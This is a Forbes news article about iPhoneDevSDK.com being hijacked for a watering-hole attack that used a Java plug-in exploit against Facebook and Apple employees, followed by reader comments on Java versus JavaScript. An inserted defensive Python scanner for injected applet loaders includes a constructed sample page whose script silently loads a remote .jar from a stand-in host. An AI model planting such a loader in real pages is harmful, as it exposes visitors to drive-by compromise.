I'm a technology, privacy, and information security reporter and most recently the author of the book This Machine Kills Secrets, a chronicle of the history and future of information leaks, from the Pentagon Papers to WikiLeaks and beyond.
I've covered the hacker beat for Forbes since 2007, with frequent detours into digital miscellanea like switches, servers, supercomputers, search, e-books, online censorship, robots, and China. My favorite stories are the ones where non-fiction resembles science fiction. My favorite sources usually have the word "research" in their titles.
Since I joined Forbes, this job has taken me from an autonomous car race in the California desert all the way to Beijing, where I wrote the first English-language cover story on the Chinese search billionaire Robin Li for Forbes Asia. Black hats, white hats, cyborgs, cyberspies, idiot savants and even CEOs are welcome to email me at agreenberg (at) forbes.com. My PGP public key can be found here.

Developer Site That Was Used To Hack Facebook And Apple Issues Mea Culpa

The recent hacker breaches of high-profile tech firms including Facebook and Apple began with the compromise of another site you’ve likely never heard of: iPhoneDevSDK.com. And now that initial victim in the hacking spree is coming clean.

“Today, we were alerted that our site was part of an elaborate and sophisticated attack whose victims included large internet companies,” wrote iPhoneDevSDK co-founder Ian Sefferman in a blog post on his popular mobile developer forum site Tuesday. Sefferman said that he only learned of the attack from a post on AllThingsD, which first reported the site’s involvement. “Prior to this article, we had no knowledge of this breach and hadn’t been contacted by Facebook, any other company, or any law enforcement about the potential breach.”

Sefferman confirms that his site was used in a so-called “watering hole” attack that infected several of Facebook’s computers, and possibly those of other companies, with malicious software when their employees visited. Sefferman writes that an administrator account for the site was hijacked to add JavaScript code that “appears to have used a sophisticated, previously unknown exploit to hack into certain users’ computers.”

According to Facebook and Apple, which was reported Tuesday to have been targeted in the same attack, that “previously unknown exploit” took advantage of a bug in Oracle’s Java plug-in in victims’ browsers. Despite the similar names, the Java plug-in and JavaScript are unrelated: on this account, the JavaScript injected into iPhoneDevSDK served only to load a Java applet, and the exploit itself ran inside the Java plug-in. Twitter, which revealed earlier that it was the victim of a similar breach, also hinted at the time that Java was involved in its compromise. A report Tuesday from Bloomberg newswires said that as many as 40 companies may have been targeted, and that the hackers seem to be based in Eastern Europe, citing unnamed sources close to a law enforcement investigation of the breaches.

Sefferman says that iPhoneDevSDK has determined that the exploit was removed by the hacker on January 30th, and the site has reset all users’ passwords to prevent the hijacked administrator account from changing its code again. Nonetheless, users should exercise caution visiting iPhoneDevSDK.com, and be sure to disable the Java plug-in in their browser if they do. (In fact, you should probably disable Java in your browser regardless: turning off the plug-in, for instance via the “Enable Java content in the browser” setting in the Java Control Panel or your browser’s own plug-in settings, does not affect JavaScript or desktop Java applications.)
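One check an operator of a site like iPhoneDevSDK can run after an incident like this is to scan saved copies of their pages for anything that hands the browser off to the Java plug-in: applet, object and embed tags, or script that calls Oracle’s deployJava helper or writes an applet tag on the fly. The following is an added example, not code from Forbes, iPhoneDevSDK or the attackers; the indicators it looks for are generic assumptions about how pages load the Java plug-in, and the sample pages are constructed, since the article does not publish the actual injected script.

```python
"""Heuristic scan for Java-applet loaders injected into a site's pages.

Added example; not code from Forbes, iPhoneDevSDK or the attackers. The
indicators are generic assumptions about how HTML hands off to the Java
browser plug-in, not a signature of the actual (unpublished) injected script.
"""
from html.parser import HTMLParser

# Strings that suggest inline script is trying to start the Java plug-in.
# Assumed generic indicators, matched case-insensitively.
SCRIPT_INDICATORS = (
    "deployJava",                 # Oracle's applet deployment helper (deployJava.js)
    "runApplet",                  # deployJava.runApplet(...)
    "navigator.javaEnabled",      # probing whether the plug-in is active
    "application/x-java-applet",  # MIME type used by <object>/<embed> loaders
    "<applet",                    # applet tag written from script (document.write)
    ".jar",                       # applet archive reference
)

# ActiveX classid of the Java Plug-in, used by <object> loaders in Internet Explorer.
JAVA_PLUGIN_CLASSID = "clsid:8ad9c840-044e-11d1-b3e9-00805f499d93"


class AppletLoaderScanner(HTMLParser):
    """Collects findings for applet/object/embed tags and for <script>
    blocks whose source or body references Java plug-in deployment."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False
        self._script_line = 0
        self._script_buf = []

    def _report(self, line, kind, detail):
        self.findings.append({"line": line, "kind": kind, "detail": detail})

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        line = self.getpos()[0]  # line on which this tag starts
        if tag == "applet":
            self._report(line, "applet-tag", a.get("code") or a.get("archive", ""))
        elif tag == "object":
            if a.get("classid", "").lower() == JAVA_PLUGIN_CLASSID or "java" in a.get("type", "").lower():
                self._report(line, "object-tag", a.get("type") or a.get("classid", ""))
        elif tag == "embed":
            if "java" in a.get("type", "").lower():
                self._report(line, "embed-tag", a.get("type", ""))
        elif tag == "script":
            self._in_script = True
            self._script_line = line
            self._script_buf = []
            src = a.get("src", "").lower()
            if "deployjava" in src or "applet" in src:
                self._report(line, "script-src", a.get("src", ""))

    def handle_data(self, data):
        # HTMLParser delivers <script> bodies as raw data; buffer them.
        if self._in_script:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            body = "".join(self._script_buf).lower()
            hits = [ind for ind in SCRIPT_INDICATORS if ind.lower() in body]
            if hits:
                self._report(self._script_line, "inline-script", ",".join(hits))
            self._in_script = False


def scan_for_applet_loaders(html):
    """Return a list of findings for one page's HTML (empty list if nothing found)."""
    scanner = AppletLoaderScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample pages (fictional hostnames, no real payload).
CLEAN_PAGE = """<html><head><title>Forum</title>
<script>var t = document.getElementById('thread');</script>
</head><body><p>Welcome to the forum.</p></body></html>"""

# The same page with an injected block of the kind the article describes:
# script that checks for the Java plug-in and writes a 1x1 applet tag.
INJECTED_PAGE = """<html><head><title>Forum</title>
<script>var t = document.getElementById('thread');</script>
<script>
if (navigator.javaEnabled()) {
  document.write('<applet code="Loader.class" archive="http://cdn.example.invalid/l.jar" width="1" height="1"></applet>');
}
</script>
</head><body><p>Welcome to the forum.</p></body></html>"""

# A page that embeds the plug-in directly from markup rather than from script.
EMBED_PAGE = """<html><body>
<embed type="application/x-java-applet" code="Loader.class" width="1" height="1">
</body></html>"""

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE), ("embed", EMBED_PAGE)):
        print(name, scan_for_applet_loaders(page))
```

Treat the output as a triage list rather than a verdict: legitimate applet content will trip the same indicators, and an attacker who obfuscates the loader (string concatenation, encoded script) will get past a substring match, so the scan is a quick first pass to run over every page template and stored post, not a substitute for comparing the deployed files against a known-good copy.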

Like Facebook and Apple, iPhoneDevSDK says it believes that none of its own user data was compromised, cold comfort to the tech firms whose employees’ computers were hacked via the site.

“We’re very sorry for the inconvenience,” Sefferman writes. “We’ll work tirelessly to ensure your data’s security now and in the future.”


This article is a little confusing. First it says there was a little-known JavaScript exploit and then it goes on to talk about a vulnerability with Oracle’s Java plugin and that we should just turn off the Java plugin in the browser.

Here is how I am reading the tech in this article: the Oracle Java plugin (the object-oriented byte-code compiled applet-running VM) is injecting JavaScript (a client-side uncompilable interpreted script of a similar name but not really related to Oracle Java) that has an exploit that can get past the security of the local computer.

I think it is more likely that the Oracle Java plugin is downloading a bytecode Java applet that is exploiting the system, and JavaScript has nothing to do with this, right?

Thoughts? Corrections? Are we still confused about what Java versus JavaScript is? Or am I making wrong assumptions about what has been written here?

Hey Steve, I can see the confusion due to the fact that both Java and JavaScript (very different things, I know!) seem to be involved here.

I can only go on what Sefferman and Facebook have said. Sefferman writes that JavaScript was injected into iPhoneDevSDK. Facebook has said that it was compromised using an exploit that took advantage of a previously unknown vulnerability in Java. So it seems that the JavaScript on iPhoneDevSDK launched a Java applet, which is what compromised the victims’ machines.

I was also suspicious that Sefferman might have confused Java and JavaScript, and wrote to him to ask for a clarification and confirmation of the use of a Java vulnerability. But I haven’t heard back from him yet. I’ll update this post if he tells me something different from what I’ve written.

If you are correct it makes Apple look even more complacent. I appreciate that some business applications are Java-based and as such some employees need to enable/disable Java for legitimate work purposes.

It looks as though the infected site did not require Java to be enabled in order to use it. Yet again it begs the question “why were (some) Apple employees so blasé about security?”.

One also wonders if Facebook told Apple (and Oracle) about the exploit. If they had kept the discovery of the Java MacAttack to themselves then shame on them. If they did tell Apple, then it suggests that Apple has some pretty serious internal communication issues.